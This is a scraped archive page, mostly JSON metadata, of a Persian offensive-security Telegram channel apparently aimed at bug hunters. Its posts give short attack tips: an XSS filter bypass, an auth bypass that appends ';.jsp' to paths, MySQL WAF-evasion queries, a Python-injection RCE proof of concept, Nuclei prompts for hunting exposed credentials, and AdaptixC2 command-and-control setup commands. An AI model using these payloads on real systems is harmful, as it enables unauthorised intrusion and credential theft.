uk
Feedback
Try Hack Box

Try Hack Box

Відкрити в Telegram

1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفه‌ای شو.

Показати більше
6 472
Підписники
+724 години
+637 днів
+11130 день
Архів дописів
\nتبدیل می‌شه به:\nalert(1)\nحالا یه کم عمیق‌تر فکر کن چی میشه اگر پیلود رو اینجوری بنویسی:\n>\nدر این پیلود، به بخش اول دقت کن:\n> → remove → \nو در نهایت پیلود معتبر میشه:\n\n@TryHackBox \n#xss","datePublished":"2025-11-28T13:45:11Z","dateModified":"2025-11-28T13:45:11Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":2,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1800},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":25},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":62},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":2}]}},{"@type":"ListItem","position":4,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2903","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2903","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2903","headline":"📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)…","articleBody":"📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته\n\n📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)  \n\nاین کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می‌ کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیب‌پذیری‌ها، و تکنیک‌های نفوذ می‌ پردازد. محتوای اصلی کتاب شامل فصل‌هایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیک‌های کپچرینگ پکت‌ها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است. \n\nاین کتاب مناسب چه کسانی است؟\nویژگی‌ های کتاب ؟\nچرا باید این کتاب را بخرید؟\nدانلود فایل های تمرین و سناریوها\nنمونه کتاب \nتوضیحات کامل را بخوانید .\n\n🔥 تخفیف بلک فرایدی \n💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  \n💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان  \n\n⚠️ مهلت تخفیف: تنها تا روز جمعه ۷ آذرماه!  \n\n📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:\n@THBxSupport","datePublished":"2025-11-26T20:16:01Z","dateModified":"2025-11-28T21:42:45Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"image":["https://n3.tlmtr.cc/p/_SSZgrthp17eL5dfjU6jnExCTf2UjNH9lP-ZkCxgWqS0?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":679},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":5,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2899","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2899","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2899","headline":"📚 کتابچه \"Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory\" از مقدماتی تا پیشرفته. اگر در حوزه…","articleBody":"📚 کتابچه \"Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory\" از مقدماتی تا پیشرفته.\n\nاگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!\n\nمنبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند.\n\n\nهمین حالا این کتاب تخصصی را به زبان فارسی بخوانید.\n\n🔥 تخفیف بلک فرایدی \n💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  \n💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان  \n\n⚠️ مهلت تخفیف: تنها تا روز جمعه ۷ آذرماه!  \n\n\n📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:\n@THBxSupport","datePublished":"2025-11-26T16:13:29Z","dateModified":"2025-11-28T21:42:45Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1666},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":28}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2898","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2898","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2898","headline":"🔖 روش دور زدن احراز هویت: 💢 مراحل: Target..com/carbon/server-admin/memory_info.jsp = ریدایرکت به صفحه لاگین […","articleBody":"🔖 روش دور زدن احراز هویت:\n\n💢 مراحل:\nTarget..com/carbon/server-admin/memory_info.jsp =\n ریدایرکت به صفحه لاگین [وضعیت ۳۰۱]\n```\nTarget..com/carbon/server-admin/memory_info.jsp;.jsp =\n محتوای صفحه رو بدون احراز هویت برمیگردونه [وضعیت ۲۰۰]\n`\nپیلود > ;.jsp\nنکته:\nمسیرهای حساس رو از فایل‌های JS پیدا کن که نیاز به لاگین دارن.\nendpointهایی رو پیدا کن که با اکستنشن تموم می‌شن مثل: .php, .jsp, .shtml و غیره.\nهر endpoint رو با پیلود همون اکستنشن فاز کن: ;.jsp ;.php ;.shtml\nاگر هر کدوم ۲۰۰ داد، دستی چک کن. ممکنه کار کنه!\n\nلایک و اشتراک گذاشتن فراموش نشه\n\n@TryHackBox","datePublished":"2025-11-26T13:25:09Z","dateModified":"2025-11-26T13:25:09Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":3,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1744},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":25},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":3}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2897","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2897","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2897","headline":"https://t.me/+XPV3S0tygl1lZGE0","articleBody":"https://t.me/+XPV3S0tygl1lZGE0","datePublished":"2025-11-26T12:00:30Z","dateModified":"2025-11-26T12:00:30Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1672},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2896","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2896","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2896","headline":"نصب/اجرای : sudo apt install mingw-w64 make wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24…","articleBody":"نصب/اجرای : \n\nsudo apt install mingw-w64 make\n\nwget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz\nsudo rm -rf /usr/local/go /usr/local/bin/go\nsudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz\nsudo ln -s /usr/local/go/bin/go /usr/local/bin/go\n\nsudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev\n\ngit clone https://github.com/Adaptix-Framework/AdaptixC2.git\ncd AdaptixC2\nmake server\nmake extenders\nmake client\ncd dist\nchmod +x ssl_gen.sh\n./ssl_gen.sh\n\n./adaptixserver -profile profile.json\n./AdaptixClient\n@PfkSecurity","datePublished":"2025-11-26T10:21:07Z","dateModified":"2025-11-26T10:21:07Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1497},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":26}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-11-26T10:20:38Z"}}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2895","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2895","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2895","headline":"AdaptixC2 v0.10 رلیز جدید بهترین open-source C2 منتشر شد https://adaptix-framework.gitbook.io/adaptix-framewo…","articleBody":"AdaptixC2 v0.10\nرلیز جدید بهترین open-source C2 منتشر شد\nhttps://adaptix-framework.gitbook.io/adaptix-framework/blogs\n\nUPD 0.10:\nتغییرات\n\nقابلیت ها : \nServer/Client Architecture for Multiplayer Support\nCross-platform GUI client\nFully encrypted communications\nListener and Agents as Plugin (Extender)\nClient extensibility for adding new tools\nTask and Jobs storage\nFiles and Process browsers\nSocks4 / Socks5 / Socks5 Auth support\nLocal and Reverse port forwarding support\nBOF support\nLinking Agents and Sessions Graph\nAgents Health Checker\nAgents KillDate and WorkingTime control\nWindows/Linux/MacOs agents support\nRemote Terminal\n\n💻 مخزن \n💻 کیت افزونه\n📔 مستندات\n\n\n#adaptixc2 #redteam #ردتیم \n@PfkSecurity","datePublished":"2025-11-26T10:21:07Z","dateModified":"2025-11-26T10:21:07Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1214},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":38}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-11-26T10:20:33Z"}}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2894","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2894","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2894","headline":"《جشن آذرگان خجسته باد》 «روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگا…","articleBody":"《جشن آذرگان خجسته باد》\n\n«روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگان است. ایرانیان باستان این روز را به برافروختن آتش و جشن و پایکوبی سپری می‌کردند، به آتشکده‌ها می‌رفتند و اهورامزدا را ستایش می‌کردند.»\n\n«از میان چهار عنصر آتش، آب، خاک و باد، جایگاه آتش برای ایرانیان، ممتاز بود، زیرا با نور و راستی اهورایی پیوند داشت. ایرانیان با اتکا به همین باور دیرین، هزاران سال جشن‌های آذرگان و سده را که حول محور آتش معنا می‌شوند، برگزار می‌کردند و بر این باور استوار بودند که وقتی می‌گویند «چراغ خانه‌ات خاموش مباد» در واقع آرزو می‌کنند پیوند فرد با نور ایزدی گسسته نشود.»\n\n«متون تاریخی و آیینی ایران نشان می‌دهد که برخلاف آنچه برخی ادعا می‌کنند، ایرانیان باستان هرگز آتش‌پرست نبودند، بلکه به باور آنان در واقع این آتش بود که آنها را به نور ایزدی پیوند می‌داد، روشنایی و گرما به جهان می‌بخشید، مظهر روشنایی در برابر تاریکی بود، حقیقت را آشکار و انسان را به بینش و خرد اهورایی نزدیک‌تر می‌کرد و هرگونه ناپاکی را می‌زدود.»","datePublished":"2025-11-24T15:20:23Z","dateModified":"2025-11-24T15:20:23Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1551},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":19},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2893","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2893","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2893","headline":"⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها SELECT -1e1 FROM test SELECT ~1. FROM test SELECT \\…","articleBody":"⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها\nSELECT -1e1 FROM test\nSELECT ~1. FROM test\nSELECT \\N FROM test\nSELECT @^1. FROM test\nSELECT -id-1. FROM test\n@TryHackBox\n#باگ_بانتی #نکته #امنیت_سایبری","datePublished":"2025-11-24T13:14:02Z","dateModified":"2025-11-24T13:14:02Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":3,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1461},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":10},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":57},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":3}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2892","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2892","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2892","headline":"🎙 قسمت دوم RadioZeroPod منتشر شد! 💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد. ✨…","articleBody":"🎙 قسمت دوم RadioZeroPod منتشر شد!\n\n💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد.\n\n✨ از تولد یک کودک تا مرگ یک قهرمان!\n\n🎧 این قسمت رو از اینجا ببینید:\n\n https://youtu.be/F7raVUzP3LY \n\n#RadioZeroPod","datePublished":"2025-11-22T17:05:30Z","dateModified":"2025-11-22T17:05:30Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":4,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1878},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":21},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":4}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2891","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2891","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2891","headline":"RCE از طریق تزریق کد پایتون: PoC: { \"name\": \"TryHackBox \", \"args\": {}, \"json_schema\": {\"type\": \"object\", \"pro…","articleBody":"RCE از طریق تزریق کد پایتون:\n\nPoC:\n{\n  \"name\": \"TryHackBox \",\n  \"args\": {},\n  \"json_schema\": {\"type\": \"object\", \"properties\": {}},\n  \"source_code\": \"def darkshadow():\\n import os\\n data='0'.encode('utf-8')\\n return ''+os.popen('id').read()\"\n}\nشما واقعاً از خوندن متودولوژی‌ ها لذت می‌برید؟\n\nاگر بیشتر می‌خواید، توی کامنت‌ها نظرتون رو بگید چه تکنیک‌هایی کار کردید...\n\n@TryHackBox \n#پایتون #rce","datePublished":"2025-11-22T13:00:55Z","dateModified":"2025-11-22T13:00:55Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1586},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":11},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":24},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2890","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2890","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2890","headline":"🔖 پیدا کردن Low Hanging Fruits با استفاده از Nuclei AI nuclei -list targets.txt -ai 💢 پیدا کردن فایل‌ های مدل…","articleBody":"🔖 پیدا کردن Low Hanging Fruits با استفاده از Nuclei AI\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌ های مدل AI/ML در معرض دید (.pkl, .h5, .pt) که ممکن است الگوریتم‌های اختصاصی یا داده‌ های آموزشی حساس را لو دهند.\nnuclei -list targets.txt -ai\n💢 پیدا کردن اسکریپت‌ های اتوماسیون در معرض دید (.sh, .ps1, .bat) که ابزارهای داخلی یا اعتبارنامه‌ ها را افشا می‌ کنند.\nnuclei -list targets.txt -ai \n💢 شناسایی هدرهای CSP نادرست پیکربندی‌ شده که 'unsafe-inline' یا سورس‌ های وایلدکارت را اجازه می‌دهند.\nnuclei -list targets.txt -ai \n💢 تشخیص صفحاتی که توکن‌ های JWT را در URL یا کوکی‌ها لو میدهند.\nnuclei -list targets.txt -ai \n💢 شناسایی پیام‌های خطای بیش از حد پرجزئیات که جزئیات فریم‌ ورک یا کتابخانه را افشا می‌کنند.\nnuclei -list targets.txt -ai \n💢 پیدا کردن endpointهای برنامه که stack trace یا کد منبع را در معرض دید قرار می‌ دهند.\nnuclei -list targets.txt -ai \n💢 پیدا کردن اطلاعات حساس در کامنت‌های HTML (یادداشت‌های دیباگ، کلیدهای API، اعتبارنامه‌ها).\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌های .env در معرض دید که اعتبارنامه‌ها، کلیدهای API و پسوردهای دیتابیس را لو می‌دهند.\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌های پیکربندی در معرض دید مانند config.json, config.yaml, config.php, application.properties حاوی کلیدهای API و اعتبارنامه‌های دیتابیس.\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌های پیکربندی حاوی اطلاعات حساس مانند اعتبارنامه‌ها، کلیدهای API، پسوردهای دیتابیس و سکرت‌های سرویس ابری.\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌های پیکربندی دیتابیس مانند database.yml, db_config.php, .pgpass, .my.cnf که اعتبارنامه‌ها را لو می‌دهند.\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌ های پیکربندی Docker و Kubernetes در معرض دید مانند docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json حاوی اعتبارنامه‌های ابری و سکرت‌ها.\nnuclei -list targets.txt -ai \n💢 پیدا کردن کلیدهای SSH و فایل‌های پیکربندی در معرض دید مانند id_rsa, authorized_keys و ssh_config.\n\nnuclei -list targets.txt -ai \n💢 پیدا کردن فایل‌های پیکربندی WordPress در معرض دید (wp-config.php) حاوی اعتبارنامه‌های دیتابیس و سکرت‌های احراز هویت\n\nnuclei -list targets.txt -ai \nشناسایی فایل‌های .npmrc و .yarnrc در معرض دید که توکن‌های احراز هویت NPM را لو می‌دهند\nnuclei -list targets.txt -ai \"شناسایی لیست دایرکتوری‌های باز که فایل‌های حساس را در معرض دید قرار می‌دهند\"\nnuclei -list targets.txt -ai \"پیدا کردن دایرکتوری‌های .git در معرض دید که اجازه دانلود کامل ریپو را می‌دهند\"\nnuclei -list targets.txt -ai \"پیدا کردن ریپوزیتوری‌های .svn و .hg در معرض دید که کد منبع را لو می‌دهند\"\nnuclei -list targets.txt -ai \"شناسایی سرورهای FTP باز که دسترسی ناشناس را اجازه می‌دهند\"\nnuclei -list targets.txt -ai \"پیدا کردن endpointهای GraphQL با introspection فعال\"\nnuclei -list targets.txt -ai \"شناسایی دایرکتوری‌های .well-known در معرض دید که داده‌های حساس را افشا می‌کنند\"\nnuclei -list targets.txt -ai \"پیدا کردن صفحات phpinfo() عمومی که جزئیات محیط را لو می‌دهند\"\nnuclei -list targets.txt -ai \"پیدا کردن داکیومنت‌های Swagger, Redocly, GraphiQL و API Blueprint در معرض دید\"\nnuclei -list targets.txt -ai \"شناسایی دایرکتوری‌های .vscode و .idea در معرض دید که پیکربندی‌های توسعه‌دهنده را لو می‌دهند\"\nnuclei -list targets.txt -ai \"تشخیص آدرس‌های IP داخلی (10.x.x.x, 192.168.x.x و غیره) در پاسخ‌های HTTP\"\nnuclei -list targets.txt -ai \"پیدا کردن فایل‌های debug.log وردپرس در معرض دید که اعتبارنامه‌ها و پیام‌های خطا را لو می‌دهند\"\n\nnuclei -list targets.txt -ai \n💢 تشخیص CORS پیکربندی که originهای وایلدکارت ('*') را اجازه می‌دهد.\n\nnuclei -list targets.txt -ai\n 💢 پیدا کردن فایل‌ های بک‌آپ و لاگ عمومی (.log, .bak, .sql, .zip, .dump).\nnuclei -list targets.txt -ai\n💢 پیدا کردن پنل‌ های ادمین در معرض دید با اعتبارنامه‌های پیش‌ فرض.\nnuclei -list targets.txt -ai\n💢 شناسایی endpointهای API رایج که داده‌های حساس کاربر را برمی‌ گردانند و وضعیت HTTP 200 OK می‌ دهند.\nnuclei -list targets.txt -ai\n💢 تشخیص برنامه‌های وب که در حالت دیباگ اجرا میشوند و ممکن است اطلاعات حساس سیستم را در معرض دید قرار دهند.\n@TryHackBox","datePublished":"2025-11-20T12:56:02Z","dateModified":"2025-11-20T12:56:02Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"commentCount":2,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1642},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":10},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":56},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":2}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2889","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2889","mainEntityOfPage":"https://telemetr.io/uk/channels/1218408024-tryhackbox/posts/2889","headline":"⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید : دوستان به علت مسدود شدن کانال ها توسط تلگرام که این رو…","articleBody":"⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :\n\nدوستان به علت مسدود شدن کانال ها توسط تلگرام که این روزا زیاد شده از شما میخواهیم در کانال های دیگر ما و شبکه های اجتماعی همراه ما باشید :\n\n💠 کانال های تلگرام ما :\n\n🔶 آموزش تست نفوذ و Red Team\n🆔 @TryHackBox\n\n🔶 رودمپ های مختلف\n🆔 @TryHackBoxOfficial\n\n🔶 داستان های هک\n🆔 @TryHackBoxStory\n\n🔶 آموزش برنامه نویسی\n🆔 @TryCodeBox \n\n🔶 رادیو زیروپاد ( پادکست ها )\n🆔 @RadioZeroPod\n\n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n👥 گروه های پرسش و پاسخ\n\n🔷 هک و امنیت\n🆔 @TryHackBoxGroup\n🔷 برنامه نویسی\n🆔 @TryCodeBoxGroup\n\n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n🔴 اینستاگرام : \n🔗 http://www.instagram.com/TryHackBox\n\n🔵 یوتیوب :\n🔗 https://youtube.com/@tryhackbox\n\n🟠 گیت هاب ما :\n🔗 https://github.com/TryHackBox/","datePublished":"2025-11-19T05:14:59Z","dateModified":"2025-11-19T05:14:59Z","author":{"@type":"Organization","name":"Try Hack Box","url":"https://telemetr.io/uk/channels/1218408024-tryhackbox","image":"https://img.tlmtr.io/c/1ksjAk/6046249694691789995?ty=x"},"publisher":{"@type":"Organization","name":"Try Hack 